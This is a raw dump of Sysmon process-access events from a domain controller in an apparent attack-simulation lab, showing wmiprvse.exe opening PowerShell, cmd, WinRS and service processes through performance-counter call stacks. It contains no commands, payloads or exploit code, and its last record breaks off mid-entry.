10341000x80000000000000005557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005550Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005549Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005548Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005547Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005546Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005545Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005537Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005536Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005535Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 